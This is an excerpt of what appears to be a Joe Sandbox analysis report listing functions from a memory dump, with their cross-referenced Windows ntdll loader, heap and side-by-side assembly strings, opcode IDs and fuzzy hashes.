                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014E8A3D
                                                • AVRF: -*- final list of providers -*- , xrefs: 014E8B8F
                                                • VerifierDebug, xrefs: 014E8CA5
                                                • VerifierFlags, xrefs: 014E8C50
                                                • VerifierDlls, xrefs: 014E8CBD
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014E8A67
                                                • HandleTraces, xrefs: 014E8C8F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 1920ab8cc5a746163dff4354ce73f7a2527c53b9c46f6b9e676d6175aec90850
                                                • Instruction ID: 284651b9061e4ba4300465ee5ce0c88d1c2e4b8cf113bcbe9012228a74830b2d
                                                • Opcode Fuzzy Hash: 1920ab8cc5a746163dff4354ce73f7a2527c53b9c46f6b9e676d6175aec90850
                                                • Instruction Fuzzy Hash: 0E912271640703EFDF21DF29D898B1B7BE5AB64A15F46081FFA406F2B1D770A8098B91
                                                Function 0146EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                • Opcode ID: 797e29047459c649c997df32b8e6243605a4ac6f56dba2f7020c259b85e78069
                                                • Instruction ID: 44758a2cdd4442f381e8cf3fb5d4726dc0826e6588b434c2e761861f6a95319d
                                                • Opcode Fuzzy Hash: 797e29047459c649c997df32b8e6243605a4ac6f56dba2f7020c259b85e78069
                                                • Instruction Fuzzy Hash: B4A27E78A056298FDB64CF18CDA87AABBB5AF45704F1441EED90DA7360DB309E85CF01
                                                Function 0145F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 16e7741f80f8021a298b9a56470b8c70cf5c4a46ba7582db28ca5b87eff630f3
                                                • Instruction ID: 25fadd3656ceb49b6d153845f8c011a700dbd96034fa11f174967b85ba6d3781
                                                • Opcode Fuzzy Hash: 16e7741f80f8021a298b9a56470b8c70cf5c4a46ba7582db28ca5b87eff630f3
                                                • Instruction Fuzzy Hash: 7F42F2716083829FD755CF29C484AABBBE5FF94204F14496FF8858B362D730D84ACB62
                                                Function 0146ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                • API String ID: 0-4098886588
                                                • Opcode ID: 561b8a8d0b63cc3ace1538aafb77f9b51463d119a2df74f84ad1e11908a7495d
                                                • Instruction ID: ce80e85ed8f2e65bf81d744591e6de42c613e920d8b4acbf99251bf3ce3ecc17
                                                • Opcode Fuzzy Hash: 561b8a8d0b63cc3ace1538aafb77f9b51463d119a2df74f84ad1e11908a7495d
                                                • Instruction Fuzzy Hash: 8F328075A00269DBDB22CF18C858BEEBBB9FB44748F1441EBD849A7361D7319E818F41
                                                Function 0147B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 83ccdd02027bb8fb23c2f85969c380cd40a6a44698e5927a06ad8897067c8307
                                                • Instruction ID: 2d0746139c946e85fa637f214d8e6d49c4b8ea5d07752f7dd7aeb2f37bd841f7
                                                • Opcode Fuzzy Hash: 83ccdd02027bb8fb23c2f85969c380cd40a6a44698e5927a06ad8897067c8307
                                                • Instruction Fuzzy Hash: 84C15671A00216ABDB258B69C880BFFBBA5EF55710F14407FED02AB3B1E7709985C391
                                                Function 014963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 072ba2d22a9344e8bfdba9c3bdc45fdfdfcd6faa9534e76afe6fce3c65ccb06a
                                                • Instruction ID: a4fdc36db824533fa81480b9a1583208d15621715db1e25068b2e57d71c26deb
                                                • Opcode Fuzzy Hash: 072ba2d22a9344e8bfdba9c3bdc45fdfdfcd6faa9534e76afe6fce3c65ccb06a
                                                • Instruction Fuzzy Hash: A9914930A003169BEF25DF59D868BAE7FA1BB50B64F16012FE5106F7B1D7B05801C795
                                                Function 0145645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 014B9A11, 014B9A3A
                                                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 014B9A2A
                                                • apphelp.dll, xrefs: 01456496
                                                • LdrpInitShimEngine, xrefs: 014B99F4, 014B9A07, 014B9A30
                                                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 014B99ED
                                                • Getting the shim user exports failed with status 0x%08lx, xrefs: 014B9A01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 0d8aa814ca586a1ab5260eee5e7b938559c850d0bba329344bc583b0a1940291
                                                • Instruction ID: 0100399d72672e176ea74599be6a793cb05c4e856c19982b41112dad1ac478be
                                                • Opcode Fuzzy Hash: 0d8aa814ca586a1ab5260eee5e7b938559c850d0bba329344bc583b0a1940291
                                                • Instruction Fuzzy Hash: 8651F3712183059FE720DF25D891A9B7BE4FB98748F41051FFA559B271D630E904CBA2
                                                Function 01492674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 014D219F
                                                • RtlGetAssemblyStorageRoot, xrefs: 014D2160, 014D219A, 014D21BA
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 014D2178
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 014D2180
                                                • SXS: %s() passed the empty activation context, xrefs: 014D2165
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014D21BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: 39e2f5a99e7fb99031ffb25347d51300679dbba940576c0af15ad4ba9840904d
                                                • Instruction ID: f98f8eb2c1fc5165d07e5d29ab7b8a8c53ccaccb60ba47f1d56dd947efe8f90b
                                                • Opcode Fuzzy Hash: 39e2f5a99e7fb99031ffb25347d51300679dbba940576c0af15ad4ba9840904d
                                                • Instruction Fuzzy Hash: A9313736B4021577FF218AAA9C41F5F7E68DBA5A41F05405FFA04BB230D3B09E02C6A1
                                                Function 0149C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 014D8181, 014D81F5
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0149C6C3
                                                • LdrpInitializeProcess, xrefs: 0149C6C4
                                                • LdrpInitializeImportRedirection, xrefs: 014D8177, 014D81EB
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 014D81E5
                                                • Loading import redirection DLL: '%wZ', xrefs: 014D8170
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                • Instruction ID: 53a17b333c1e43d5705a8d2c1dc9691a87db1ed9634a6adb02261e8f5ee2e538
                                                • Opcode Fuzzy Hash: 6ee8b4992e9ec9682ade2d37ce5591bf79bc29168bb267fe700dba836cb15b54
                                                • Instruction Fuzzy Hash: 203115716443069BD710EF2ADC45E2ABBD1AFA4B10F05051EF9446B2B1D630EC04C7A2
                                                Function 01479950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                • API String ID: 0-3393094623
                                                • Opcode ID: 3a190b5b8b470af4c175dbb78f70532deba4e39112824bb130dca541e1122f0d
                                                • Instruction ID: ec1d0e5759a4342f4fc9a0a3965fcca1edc88ad81e323b2b59f3b314c7e68702
                                                • Opcode Fuzzy Hash: 3a190b5b8b470af4c175dbb78f70532deba4e39112824bb130dca541e1122f0d
                                                • Instruction Fuzzy Hash: 58026D755083818FD761CF28C180BABBBE5BF88B68F44491FE9899B361D770D845CB92
                                                Function 014A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 014A2DF0: LdrInitializeThunk.NTDLL ref: 014A2DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014A0D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                • Instruction ID: 8c0bed5839527321b85b2bb3bd97cf99645feee92e220540518cd00bdd6c2208
                                                • Opcode Fuzzy Hash: 80ad829c096735aec9e7cf6295e1b40c7fe80f26da176ffa200cb575d8e2a6a0
                                                • Instruction Fuzzy Hash: FC426B71900705DFDB21CF28C890BAAB7F4BF14314F4585AAE989EB351E770AA85CF61
                                                Function 014E4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                • API String ID: 0-2518169356
                                                • Opcode ID: df3d7f3e5bb029b0ecd04049672b3b5cfe3017639fb7ed441964e9adba5b7a20
                                                • Instruction ID: 6a6c836a94bef8d949c3ee82fe0453373cd554cdaa96a188c4ff8d128f8115cb
                                                • Opcode Fuzzy Hash: df3d7f3e5bb029b0ecd04049672b3b5cfe3017639fb7ed441964e9adba5b7a20
                                                • Instruction Fuzzy Hash: 2A91CF76D0061A8BCB21CF9CC888AAEFBF1EF48715F59416AE950EB360D735D901CB90
                                                Function 0149C720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$h?$h?$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2179362479
                                                • Opcode ID: d31f992713e06f88abc3ba7f7f3e7f57ae30a121925b66fbc4ff123cc5349530
                                                • Instruction ID: 79168b7ea0e6a6bfa8bdf9dbd214537e7fb6201ca22626df921874183abd83ec
                                                • Opcode Fuzzy Hash: d31f992713e06f88abc3ba7f7f3e7f57ae30a121925b66fbc4ff123cc5349530
                                                • Instruction Fuzzy Hash: E141F471540302ABDB20EB69D894F5F7BE8EF58760F01492FF9589B270E770E8049BA1
                                                Function 014770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 506bb50e11844f277b6f7e4415a0e63e1e855a7d44548ee355613d5b9199024f
                                                • Instruction ID: a5e272a57ea8eb55e80f72490b421a24389345af59c997bd17b1ac72f83ee5a9
                                                • Opcode Fuzzy Hash: 506bb50e11844f277b6f7e4415a0e63e1e855a7d44548ee355613d5b9199024f
                                                • Instruction Fuzzy Hash: 9713B270A00256CFDB25CF69C4887EABBF1FF59304F14816AD949AB3A1D734A946CF90
                                                Function 0147A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 014C7D56
                                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 014C7D39
                                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 014C7D03
                                                • SsHd, xrefs: 0147A885
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                • API String ID: 0-2905229100
                                                • Opcode ID: a15c001fc3c28b3efb9fa4c09a9bba59bb9a264fb716cf7d52cc82e032b7e32d
                                                • Instruction ID: bd28c7f195cf233ea92bfcd8e74458ee1f43569b40fe3734276ebd9110913474
                                                • Opcode Fuzzy Hash: a15c001fc3c28b3efb9fa4c09a9bba59bb9a264fb716cf7d52cc82e032b7e32d
                                                • Instruction Fuzzy Hash: 53D1A275A00215DFDB25DF98C9C06EEBBB1FF58710F29406BE905AB361D3319855CB90
                                                Function 0146A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                • Instruction ID: 6cfdd3bf53c57f47f47e414cb5bb55b989087353581e8604280a835d431251e0
                                                • Opcode Fuzzy Hash: 808d2b106ddb9752a557256733bf06bc6a46e5bae7944e2b7152409f333a8abc
                                                • Instruction Fuzzy Hash: D6C18774108B828BD711CF58C544B6AB7E8BF94708F10486FF996AB361E374C94ACB53
                                                Function 01498402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • @, xrefs: 01498591
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01498421
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0149855E
                                                • LdrpInitializeProcess, xrefs: 01498422
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                • Instruction ID: faf968c33d6002175afbdceaa9a695d561b5d75ef86df5b8b241f1c642130e86
                                                • Opcode Fuzzy Hash: c90a563027a6130713e103c15e5a0ec6d4babb124166f4ca0ed35894166af3a8
                                                • Instruction Fuzzy Hash: 8591C071508346AFDB21DF69CC50FABBAE8BFA4754F40082FF68496121E730D908CB52
                                                Function 01470C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 014C54E0, 014C55A1
                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014C54ED
                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 014C55AE
                                                • HEAP[%wZ]: , xrefs: 014C54D1, 014C5592
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                • API String ID: 0-1657114761
                                                • Opcode ID: 0e59850f9de84d010d8885869e810b2b8f6ed079d08557d744125daf4ce8c340
                                                • Instruction ID: a624df95f1593a404fe007fa0bbbabb3cfcd8158dfa41fe014b0744ea4f4e01a
                                                • Opcode Fuzzy Hash: 0e59850f9de84d010d8885869e810b2b8f6ed079d08557d744125daf4ce8c340
                                                • Instruction Fuzzy Hash: A9A1D1306013069FD729CF28C440BBBBBF1AF56700F14856FE8968B7A2D730A846C791
                                                Function 0149273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014D22B6
                                                • .Local, xrefs: 014928D8
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014D21D9, 014D22B1
                                                • SXS: %s() passed the empty activation context, xrefs: 014D21DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                • Instruction ID: 04fe8a39e9cf950a1d5422c10e859586b6d5d6288763dd6fde0f851aad6b3c93
                                                • Opcode Fuzzy Hash: 8d94ff2c33f2d8a691d6bcaf917bb12f6e49f284da4186fe78554bbcdb3d6680
                                                • Instruction Fuzzy Hash: B4A19231A40229AFDF24CF59D884B9AB7B1BF58354F1541EBE908AB361D7709E81CF90
                                                Function 01494AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 014D342A
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 014D3456
                                                • RtlDeactivateActivationContext, xrefs: 014D3425, 014D3432, 014D3451
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 014D3437
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                • Instruction ID: 974b915af1f925be5446aa038c21fdeff143f5b65dd992a8ad9b06164528dbb3
                                                • Opcode Fuzzy Hash: 653a917a091a4532c1dc1c00f136ad9d61e134d535cc38d3e80b979286bf07e7
                                                • Instruction Fuzzy Hash: E76125726407029FDF22CF19C951B2BBBE4AF90B10F19852FE9559B360D734E802CB92
                                                Function 014664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 014C0FE5
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014C10AE
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 014C1028
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 014C106B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                • Instruction ID: bb4997a24014b075a01959d2582804f22dd9d64eea164f83a84fc979ee9873d4
                                                • Opcode Fuzzy Hash: d1957b35d4c5f7bcdf813f339f6633225f657adcc0c63249c0de3bc392d7fbe5
                                                • Instruction Fuzzy Hash: E371F1B19043469FCB60DF15C885B9B7FACAFA4768F41046EF9488B266D334D588CBD2
                                                Function 0148245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpDynamicShimModule, xrefs: 014CA998
                                                • minkernel\ntdll\ldrinit.c, xrefs: 014CA9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 014CA992
                                                • apphelp.dll, xrefs: 01482462
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                • Instruction ID: 403ea694d01ee7f322710deefaca31360852b31326e2a05e57daff460575a1d3
                                                • Opcode Fuzzy Hash: b12b1ca09dfd1de5ca3bd5c2aacd857f79e1ca8c07b8b841f53afcb936ae7c0b
                                                • Instruction Fuzzy Hash: 40313779600306ABDB719F5D9855EAABBB4FB80F04F26001FE8106B375E7B05986D790
                                                Function 014729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 01473264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0147327D
                                                • HEAP[%wZ]: , xrefs: 01473255
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
